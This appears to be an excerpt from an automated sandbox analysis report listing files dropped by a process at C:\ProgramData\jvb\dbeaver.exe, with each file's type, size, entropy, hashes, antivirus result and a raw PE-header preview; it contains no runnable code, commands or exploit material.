      SHA-512:A77AC48DE9CEF4F84673C2268545AB2E72CB27A9713F3427769DD462DBA0385D663883E319BDC8EE6CDD62B9C5E9EE59F9A878955C8CEC65974528C49A1432D4
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I.....................V.......5..FP.........................e.........h.........Rich..........................PE..d.....gw.........." .........................................................`............`.................................................h........@...........V...........P......p0..p............................0..0............................................text.............................. ..`.rdata..0!......."..................@..@.data...8...........................@....pdata...V.......X..................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):40448
      Entropy (8bit):5.797311825975958
      Encrypted:false
      SSDEEP:
      MD5:6008C8DEF6B1C5D760BD084ED652F3A2
      SHA1:1936CA1E4120B7383967C8BEF537F73865442B01
      SHA-256:0A16299FF6B2991F613169CFECC511FC672D2DFEDC80C669AFD0CCC2F4E6E421
      SHA-512:2C75704566EAB9DC7648CEF00FD9B6AD174CB24E291F611A784D54B20A1B47D2C2C9C73001D4E124D152BAFAF5C148583F1BD4B61540164D11DACCE865FB1838
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........L.z..z..z......z...{..z...{..z..{..z......z...~..z...y..z.S.~..z.S.z..z.S...z.S.x..z.Rich.z.................PE..d....1.k.........." .....T...N.......W....................................................`.........................................P...........x.......x....... ...............,.......p...........................0...0............p..P............................text....R.......T.................. ..`.rdata..46...p...8...X..............@..@.data...h...........................@....pdata.. ...........................@..@.rsrc...x...........................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):68096
      Entropy (8bit):5.944729887215652
      Encrypted:false
      SSDEEP:
      MD5:5C6E89CD7CBDC066F4D0B3B777E84163
      SHA1:52B7684621F72E1C17F7B14075B9F13C022F52AF
      SHA-256:F2FD95DCC3444CCF176C0E23460E952445D226F1A2083A87380F33657D1266C5
      SHA-512:D80FE5DFA3D65783485C46499996FA7BAF2FE11D278F1D3CCD13950EE7EEC9D517D74130D2E47A132F44FA47F113448947918A78D7531B2D731FD571E0AF182D
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......i...-vz.-vz.-vz.$..%vz...{./vz.v.{..vz.-v{..vz.....&vz...~.%vz...y.)vz...~.#vz...z.,vz.....,vz...x.,vz.Rich-vz.................PE..d...]............." .........V......T........................................P............`.............................................<............0....... ...............@..,...`...p...............................0............................................text............................... ..`.rdata..$8.......:..................@..@.data...h...........................@....pdata....... ......................@..@.rsrc........0......................@..@.reloc..,....@......................@..B................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):17920
      Entropy (8bit):5.194965389230128
      Encrypted:false
      SSDEEP:
      MD5:92290A660251AE3CEB7595063C2310C4
      SHA1:F113F956388A57D085B65E23B28864C14B28F6EC
      SHA-256:ECABFA2CB5C42E5D978DE885A8EB6AB6BE845610DBF9AC0D13042EBBC07CF799
      SHA-512:A38069D0221F3CECACB59AFD951048C83D03694B9361FF60002DFEAE919517058E2DBDE5192C35DA0471DF1B5997ACB4346F5CFB970AB1F74F365D0E88FC1606
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........]...]...]...T.m.[......_......W......Z......_.......Z...]...`......\......\......\......\...Rich]...................PE..d.....=..........." .........$.......#....................................................`.........................................@>.......?.......p..x....`.................. ....7..p...........................P8..0............0...............................text...(........................... ..`.rdata..>....0......."..............@..@.data........P.......:..............@....pdata.......`.......<..............@..@.rsrc...x....p.......@..............@..@.reloc.. ............D..............@..B................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):34816
      Entropy (8bit):5.176584389650015
      Encrypted:false
      SSDEEP:
      MD5:4AFC95311DB50A42276B31CFD88086E6
      SHA1:2E270E3CA51FF1C7ED84313ABE4DFD5F1FB473F5
      SHA-256:5DD6265C9006EFBD0C870A639E0707792670C5A0B57DC6C62CEF6F40D410628C
      SHA-512:FCC1BE213DCD589EECEA5C4CAE69BA79D2E27D5C9CBA2545E55325DBDF3FEEC427FA52AB0062A586B8B4FC8271253F1F014E9EFE7B01441EF7720A661DC1EA56
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........3t.n]'.n]'.n]'...'.n]';.\&.n]';.X&.n]';.Y&.n]';.^&.n]'..\&.n]'.n\'.n]'t.X&.n]'t..'.n]'t._&.n]'Rich.n]'................PE..d......?.........."......8...L......$2.........@..........................................`.................................................|{..................l...................Hq..p............................q..0............P..h............................text...L7.......8.................. ..`.rdata...8...P...:...<..............@..@.data...P............v..............@....pdata..l............x..............@..@.rsrc................|..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):95744
      Entropy (8bit):5.731166327192861
      Encrypted:false
      SSDEEP:
      MD5:2FDB17B7631806711DC9C5C6932700CB
      SHA1:45A0E33403294748BF192306B1B127E869B74680
      SHA-256:19D5EF7B418380FC80D9A6AF81AFCD2879BC6A9E2519D89289BAA1FA39E5D5E5
      SHA-512:82860AF3A88EC1B7A72FBEAC6773D686641F712B18713F42547F502806CBDC439B7AF867A3A02C2F3A92E95D7F8C988DFAB3B6748A191DC7628CEE29A3BF6252
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E~!Y..O...O...O..g....O..oN...O..oJ...O..oK...O..oL...O.ZwN...O...N...O..nK...O..nJ...O..n....O..nM...O.Rich..O.........PE..d....W~h.........."............................@..........................................`.................................................<I..,...............................p....7..p....................9..(...P8..0...............p............................text...u........................... ..`.rdata..^I.......J..................@..@.data........`.......D..............@....pdata...............R..............@..@.rsrc................b..............@..@.reloc..p............t..............@..B........................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):60416
      Entropy (8bit):5.619734635549969
      Encrypted:false
      SSDEEP:
      MD5:A01E028697AEEC0AD91F9B61DFC5E774
      SHA1:7191FF760BB7EFB23F73A19F6C55A0801F4F8674
      SHA-256:186C68155CB8A47938EF3CB885B004876E1A1517F78E1FDE8561B9465663E7BF
      SHA-512:A1B170E6C24FE4E7C055B00D867F784EDAE2BAEA6D08CD5F473F0BB7130E0521AE96CBE419AE1702F7C9B14EA895A086C4AAF721F6A9AC6D70C39E3A8C7C6A5A
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........\..........5.............................................L......L......L.Y....L......Rich...................PE..d...&^..........."..........h......8..........@.............................0............`.....................................................,............................ ..`...P...p...............................0............................................text...s........................... ..`.rdata...:.......<..................@..@.data...`...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..`.... ......................@..B................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):136192
      Entropy (8bit):6.2920987023174515
      Encrypted:false
      SSDEEP:
      MD5:C80E517183A3A9CA976E97208BE7DFA9
      SHA1:67506BE18D62F2436EE8787A7EF8899CA2CEBE14
      SHA-256:DE697820C2A55E1B39A59E575D4DDE52BEF58325A1AE56D4FE17609CC69A31EB
      SHA-512:C78376BE06E48E4FE4DE9078134FF393AED159527D92DEC66E084CE0E0E6A7CA96D6FA94716FBCB0A9DF415341F9B0297C9F301233145EEBCA6B1D31C668E1EF
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"...CwR.CwR.CwR.;.R.CwRi3vS.CwRi3sS.CwRi3tS.CwR.+vS.CwRi3rS.CwR.+qS.CwR&2vS.CwR.CvR.BwR&2sS.CwR&2wS.CwR&2.R.CwR&2uS.CwRRich.CwR........PE..d....)............" .....H...........N.......................................P............`.........................................p...X=...........0..x.... ...............@......`...p...........................0...0............`..X......@....................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata....... ......................@..@.rsrc...x....0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):39424
      Entropy (8bit):5.999656225816373
      Encrypted:false
      SSDEEP:
      MD5:BEC10DDCAFAB9547E55B6D8D50774A9B
      SHA1:263401B4163CB17BEB823E2167BD3468ED6687B3
      SHA-256:446C12EE3396FAC124809D6CE9BDBE51FB330CABA79DD4FD09D8573258168069
      SHA-512:E0AECE366067EEEF4E40B64B01A1F5745631B380A45EF3B74C131F80C2E31A08E92E4372AEC608A837E58B16334BD014CB5EFFB4321362E07F8992B1437D1B00
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R...R...R...[.@.^......P.......P......C......[......P......Q...R...e......S......S....,.S......S...RichR...........................PE..d....V. .........."................. ..........@....................................\.....`.........................................`(..@....(.......`..<n...P..D...............4...."..p...........................`#..0............ ...............................text............................... ..`.rdata..".... ......................@..@.data........@.......$..............@....pdata..D....P.......&..............@..@.rsrc...<n...`...p...(..............@..@.reloc..4...........................@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):276992
      Entropy (8bit):6.364368132697265
      Encrypted:false
      SSDEEP:
      MD5:5E45FBFF97462A7155E23C14E42325DB
      SHA1:2827D965E269DDEA6D9ED5C0F51695D476B65426
      SHA-256:08B5EAA37FEB6C77AF9D26A415BC2248535098D7BB3DEFF128A5D8EA52C16127
      SHA-512:FE161D9EA2A6EF6925A86DBFB93338353E4FDFDB24F5A4A0560CF3E95906030A6FC4CE62613FB267CF1421A6E930978F0B8F57C59F2C9CADD7A92DD81FD6E572
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..D...D...D....z..N....z..N....z......b..e...b..J...b..M....c..F....z..A...D........c..A....c..E....c/.E....c..E...RichD...................PE..d...shQ..........." .....J..........T.....................................................`.....................................................P....p..P....@..................x.......p...............................0............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata.......@......................@..@_RDATA.......`.......(..............@..@.rsrc...P....p.......*..............@..@.reloc..x............2..............@..B........................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):168448
      Entropy (8bit):6.361385153333845
      Encrypted:false
      SSDEEP:
      MD5:CECCDC7C97C829FDF5EE969B4BE753C1
      SHA1:9BFFF6B7628B9485BABE742DA2DD72AFB3B7E190
      SHA-256:5819BA243940969E26E80710113A357A107DCE61E9032EDD46BD441C4FA303FB
      SHA-512:AC92EEB1423B3B88B3691BDC80CEB7AF9CFBD208CF95BA3F178870F00B5771183D036B8D3FB363AAAD8D0BFF8EC1659CC422C55DF780EFFF76248D3957910681
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............{...{...{.....{.G.z...{..z...{.!{....{.G.~...{.G.....{.G.x...{...z...{...z...{.......{...{...{.......{...y...{.Rich..{.........PE..d..............." ......................................................................`..........................................q..8...Hw..................................,...@I..p............................I..0............ ...............................text............................... ..`.rdata..X]... ...^..................@..@.data................n..............@....pdata...............p..............@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):39424
      Entropy (8bit):6.006456832962356
      Encrypted:false
      SSDEEP:
      MD5:28F181141BE8F0A64C12F443B7276BF1
      SHA1:BDC48E1B07C66B70C5B2432130AB384916CED12A
      SHA-256:A8D91315ADE887D1C02CAC4FF151C454623EC289EEF8A66D1E6493F91884E95E
      SHA-512:2E1B6AA7D70DF6F5433CF10B65DC0AE4E9EE43F106B231D08544E1511000E58E63E18298AB5EC88F8E2835294E0406DBE5EE2FBE78705D39B34378081C7F6CED
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... y..d...d...d...m`@.h...h..f...?p..f...h..u...h..m...h..f....i..g...d...\....i..e....i,.e....i..e...Richd...................PE..d.................".................(..........@....................................".....`.................................................d(.......`..<n...P..P...............4....#..p...........................p#..0............ ...............................text...<........................... ..`.rdata....... ......................@..@.data........@.......$..............@....pdata..P....P.......&..............@..@.rsrc...<n...`...p...(..............@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):10752
      Entropy (8bit):4.519355889246587
      Encrypted:false
      SSDEEP:
      MD5:C07EB14A1C6A82A42F5340C1D7BDE133
      SHA1:D9DBDF84789131CA0CB9D2B65147E8AD31F3DB02
      SHA-256:7BFBF65DD8ED7C51ECDAE0D36DCA401ECF6BC189F5CE872BE1166FEDE036C631
      SHA-512:505153F5D150F992CA763FA87EE0140444808E536B1951F4F8FC0CE9AC69C1A0138E76CBC45FB407EE8FE132C0285A10E558916B8B12B38B9D3787058B277FE9
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l..?..?..?..^?..?...>..?...>..?...>..?...>..?...>..?R..>..?..?..?R..>..?R..>..?R.2?..?R..>..?Rich..?........PE..d......B.........." .........................................................p............`..........................................'..H....'..d....P..x....@...............`.. ....!..p........................... "..0............ .. ............................text............................... ..`.rdata..f.... ......................@..@.data........0....... ..............@....pdata.......@......."..............@..@.rsrc...x....P.......$..............@..@.reloc.. ....`.......(..............@..B................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):13312
      Entropy (8bit):4.911443562493425
      Encrypted:false
      SSDEEP:
      MD5:800A458A345F07EC2285DED37407B48D
      SHA1:CEC248F7C67819E336402019B3C5FFD80FDFC39D
      SHA-256:C08983BF2B72497560D43EBA9CE7597DE5D27A3CECE8F979BFBE9C3C35B05D42
      SHA-512:68F59761E42133D749F0892F46C1BD74E1B5FA65D0E5383D4368F0CEFCCAE606A8D71DD9EE6978E2BE2FB25BDA849408BDC508841272DD7C4AC1742B235716F2
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R...R...R...[.@.^......P.......P......C......[......P......Q...R...e......S......S....,.S......S...RichR...........................PE..d......c..........".........."......$..........@.....................................y....`..........................................(..@....(.......`.......P..D............p..8... #..p............................#..0............ ...............................text............................... ..`.rdata..R.... ......................@..@.data........@.......$..............@....pdata..D....P.......&..............@..@.rsrc........`.......(..............@..@.reloc..8....p.......2..............@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):23040
      Entropy (8bit):5.426663551008978
      Encrypted:false
      SSDEEP:
      MD5:82454ED0676F1C0EB70ADC45FD03541F
      SHA1:417832A6FFCA21FBE54D78CE2DDEF1B42EDBFF92
      SHA-256:2894047404B2432B5C44B014F0B086B0394CB15BDAB7779DA024968910548A49
      SHA-512:67706487B43EAAFF34A6526DD783345183E7A693C5123323163E9A18C0E74022AD92F1A7BCA7B2FB02F43104CFB25EE0200905E6ACF3C007DD0BA6CD77CBE499
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e>V..P...P...P..|....P..tQ...P..lQ...P...Q...P.m.....P..tU...P..tT...P..tS...P.DuU...P.DuP...P.Du....P.DuR...P.Rich..P.........................PE..d................." .........0.......1....................................................`.........................................0R.. ...PS...............p.......................D..p...........................@E..0............@...............................text....,.......................... ..`.rdata.......@.......2..............@..@.data...@....`.......N..............@....pdata.......p.......P..............@..@.rsrc................T..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):13312
      Entropy (8bit):4.956378754700419
      Encrypted:false
      SSDEEP:
      MD5:C5D536E7D306C66AC191776EDBFA10DA
      SHA1:AE06D3B56696911ECAEB63D348B70A1B0451FF0E
      SHA-256:A68A3013447CFAC8B8978DEB839E415958941E433948AD8997F2AEB386D388E9
      SHA-512:CBAFDA8743D14D8E563B7930DAA42CCD0F8132C4AB43B0EDACE2D857A23AF3201308CC948D30E6A70C46B53D0F1069193398F12E5F6FD72C3F711A258FB506A7
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R...R...R...[.@.^......P.......P......C......[......P......Q...R...e......S......S....,.S......S...RichR...........................PE..d....19..........".........."......$..........@..........................................`..........................................(..D...4).......`.......P..D............p..<....#..p............................#..0............ ...............................text............................... ..`.rdata....... ......................@..@.data........@.......$..............@....pdata..D....P.......&..............@..@.rsrc........`.......(..............@..@.reloc..<....p.......2..............@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):76288
      Entropy (8bit):6.517342757585585
      Encrypted:false
      SSDEEP:
      MD5:B28366AC9A667FF618D57255D16FFACD
      SHA1:F87298039BB9FB5040E10FEBC388BFDE3BAB1E78
      SHA-256:0B8C91189B539084EA98D8979F4F834DD9A5FB7624B8E6063937EBCD2A9D1727
      SHA-512:B670F54DD68E95CCE73EDCF67FF232651A4831DD19C08EB7EB0449FEA095BA998DF3D48BBEB8A8619C9BCB066EC6E23E3BEF88B7636B158EED40DF904AB28E9A
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b..W&...&...&.../.H.*......$....o.. ......*............."...}...!...&...@.......(.......'.....$.'.......'...Rich&...........PE..d...z............" .........~..............................................p............`.............................................D............P..p....@..D............`..X.......p...........................@...0...............@............................text...8........................... ..`.rdata...e.......f..................@..@.data........0......................@....pdata..D....@......................@..@.rsrc...p....P.......$..............@..@.reloc..X....`.......(..............@..B................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):13312
      Entropy (8bit):4.953254644179347
      Encrypted:false
      SSDEEP:
      MD5:B862268F1965E990E75577323EE9F1D5
      SHA1:4A3AE4A1E0DC15DE2C8F31F0877A2F1291F4F970
      SHA-256:B35D3865A238CF2C77CE663BA7FBC58332A066598F6C922A0B8C6AAB8EAE7F0C
      SHA-512:7CBE93D866E4420B20E6A791D2CD6488D5F5C6FAA1E66031634BC64001971D1539B39AC680F73496737A354E510B40DEB1B152F178DC5BCE4E37CBFAC11F10EC
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R...R...R...[.@.^......P.......P......C......[......P......Q...R...e......S......S....,.S......S...RichR...........................PE..d...:..w..........".........."......$..........@....................................h.....`..........................................(..@...0).......`.......P..D............p..<....#..p............................#..0............ ...............................text............................... ..`.rdata....... ......................@..@.data........@.......$..............@....pdata..D....P.......&..............@..@.rsrc........`.......(..............@..@.reloc..<....p.......2..............@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):13312
      Entropy (8bit):4.916530436803457
      Encrypted:false
      SSDEEP:
      MD5:03F15CAE130E8F9E5E06A51C508B417B
      SHA1:C8A954FFF564A04F31987405CF2037508AE2B801
      SHA-256:6F2857E75A5AF768CC4FB5461B71A9B2F064FAE9AAFE91D9521C332C126F51CB
      SHA-512:2C82E1E1AB195A9CB7163CF4CA9EC41A8275758EB55D5D5C913102F270FD665F56F5E274EA3C602FE72749819AA12E4DAD099ADB4059E0F63DA4BE8B876B22A7
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R...R...R...[.@.^......P.......P......C......[......P......Q...R...e......S......S....,.S......S...RichR...........................PE..d...+.............".........."......$..........@.....................................b....`..........................................(..@....(.......`.......P..D............p..8... #..p............................#..0............ ...............................text............................... ..`.rdata..R.... ......................@..@.data........@.......$..............@....pdata..D....P.......&..............@..@.rsrc........`.......(..............@..@.reloc..8....p.......2..............@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):13312
      Entropy (8bit):4.936689542967849
      Encrypted:false
      SSDEEP:
      MD5:A8974018134363EAABE3B9830179F083
      SHA1:BE634B82F39334C16E22BF6C2984890B81A9B0D3
      SHA-256:B8446C517BA2892C55B287BBC24FC1A92B8386D1601DE44EC72A21D7DF16B94F
      SHA-512:09D8078E76343EA439B2C227CF4EF66B5A0179D92D30DA63EA570D85D43D1E69D320EC696433995338B997642276051C25CCC3E43F2C4B03E1C3E4AA78ABA5D7
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R...R...R...[.@.^......P.......P......C......[......P......Q...R...e......S......S....,.S......S...RichR...........................PE..d.................".........."......$..........@....................................4.....`..........................................(..H....).......`.......P..D............p..<...P#..p............................#..0............ ...............................text............................... ..`.rdata....... ......................@..@.data........@.......$..............@....pdata..D....P.......&..............@..@.rsrc........`.......(..............@..@.reloc..<....p.......2..............@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):50176
      Entropy (8bit):6.165042018470988
      Encrypted:false
      SSDEEP:
      MD5:5660DBC9C0792291D09FBE6560E366E1
      SHA1:DC645244196DCA5E5AD9161E74F97C37B8AF7845
      SHA-256:4487DEB9A9B35EFC0058E77143E2B5C9C92DF966417E475A63F8B159BBC1CE62
      SHA-512:BD80C3A1994DA4BE78FDC0B6C22290861DE6A179046229C211626470193FE6B3E5B5C17B51E75D5775F807127F5F5B99363DFE79A6FDB961FF6E770915FA79A6
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|8..8Y..8Y..8Y..1!m.0Y...)..:Y...)..+Y...)..0Y...)..;Y..c1..3Y..8Y..ZY..(..;Y..(..6Y..(..9Y..(..9Y..(..9Y..Rich8Y..................PE..d...(............." .....~...T...........................................................`.........................................0...........................0...............L......p...........................@...0...............0............................text....}.......~.................. ..`.rdata.../.......0..................@..@.data...............................@....pdata..0...........................@..@.rsrc...............................@..@.reloc..L...........................@..B........................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):13312
      Entropy (8bit):4.9574724922296864
      Encrypted:false
      SSDEEP:
      MD5:EB9D891653F1D2C6179434197028CB6A
      SHA1:FB297AD3E2BDA25072C4273E06BB2556217858A8
      SHA-256:B700E9D618AB6A7618B52A2A246E2717F1ACA29E1451C20A749D2453E31F8AAE
      SHA-512:5D6F40653F5F0E732EE82289A60F2F38D423AFB522008EE9616E676D816A085E165E6CF75805E846F0FE38197013340FA5549A78D796CD163A5268052552E5B1
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R...R...R...[.@.^......P.......P......C......[......P......Q...R...e......S......S....,.S......S...RichR...........................PE..d...7)............".........."......$..........@....................................._....`..........................................(..D...4).......`.......P..D............p..<....#..p............................#..0............ ...............................text............................... ..`.rdata....... ......................@..@.data........@.......$..............@....pdata..D....P.......&..............@..@.rsrc........`.......(..............@..@.reloc..<....p.......2..............@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):13312
      Entropy (8bit):4.916158595318
      Encrypted:false
      SSDEEP:
      MD5:5BCA6F26D997A607A8EAD826BF015BDD
      SHA1:5C415B94135475C5FC55566BD1E0166A62942656
      SHA-256:825615345F3A5DF39D91CA205422EBDCA0B8C01B54C2319624CD3D9312335810
      SHA-512:1504A2078A2FE8C7839DCE48614837C1E559A224E8FC1C098B70DE7E4768B07B49CC2C619E7AD65883626288D0A0C901642223F634B833B9D479CB39C5C4CFBD
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R...R...R...[.@.^......P.......P......C......[......P......Q...R...e......S......S....,.S......S...RichR...........................PE..d.................".........."......$..........@.....................................}....`..........................................(..D....(.......`.......P..D............p..8... #..p............................#..0............ ...............................text............................... ..`.rdata..Z.... ......................@..@.data........@.......$..............@....pdata..D....P.......&..............@..@.rsrc........`.......(..............@..@.reloc..8....p.......2..............@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):13312
      Entropy (8bit):4.918240955936726
      Encrypted:false
      SSDEEP:
      MD5:E189C2FE30814187401D76C88357398B
      SHA1:9FF6E770BB7FD5AD59D12F96B9DC2F66792ECF27
      SHA-256:468995E4671D0D1BFFB3C9598DB406FCC8F4C641010C026B1886F0C70B904E19
      SHA-512:F1EDCB1E9AA307FC11F67E90B9BDACBBF4BB6F6F58FF966BC950C263D1D7835D2E75FE524F56ADF43951F24A64FEE11207C45DC6CD70CD8DE2509661B9CE92A4
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R...R...R...[.@.^......P.......P......C......[......P......Q...R...e......S......S....,.S......S...RichR...........................PE..d...G`s...........".........."......$..........@....................................w.....`..........................................(..D....(.......`.......P..D............p..8...0#..p............................#..0............ ...............................text............................... ..`.rdata..j.... ......................@..@.data........@.......$..............@....pdata..D....P.......&..............@..@.rsrc........`.......(..............@..@.reloc..8....p.......2..............@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):13312
      Entropy (8bit):4.931234536559868
      Encrypted:false
      SSDEEP:
      MD5:7FE4B691929E2F2A0DF0F7777AA2D220
      SHA1:BB597E74DD1EEF34C7A0924810324DCF8642CB6E
      SHA-256:B77ACF28CA02E02101A4161E79410A35AB78906D449754CADD0D76D3F05698AA
      SHA-512:06B297F545C62635F9D5B3FFEDB4F7B75A988E2FE9C9A082BF3CC9F81DA104E47F56D05F6FF858D2FCAC6ACD0BAA63264003B02675C40B406592364A9CC6139B
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R...R...R...[.@.^......P.......P......C......[......P......Q...R...e......S......S....,.S......S...RichR...........................PE..d.....i...........".........."......$..........@....................................Yw....`..........................................(..D....(.......`.......P..D............p..8...@#..p............................#..0............ ...............................text............................... ..`.rdata..z.... ......................@..@.data........@.......$..............@....pdata..D....P.......&..............@..@.rsrc........`.......(..............@..@.reloc..8....p.......2..............@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):13312
      Entropy (8bit):4.9329308630351365
      Encrypted:false
      SSDEEP:
      MD5:315B34A5D87BB9A45AF9869F95E27518
      SHA1:6C8E218D310F0CCED93AB0FF7C719F424C03E6BC
      SHA-256:551804B00097E2FEE92E9FC8CC94DC68636F16A6FC47744B450D5405DE10A6B8
      SHA-512:68032746C6DBFAD70AD70168B3DB990E875C0F6D89E81486C1B6431DFF87A87B724839A92AD64AA8BF5D2A8C6D906752065BAF99E3808FF0438BB316DC006E7C
      Malicious:false
      Reputation:unknown
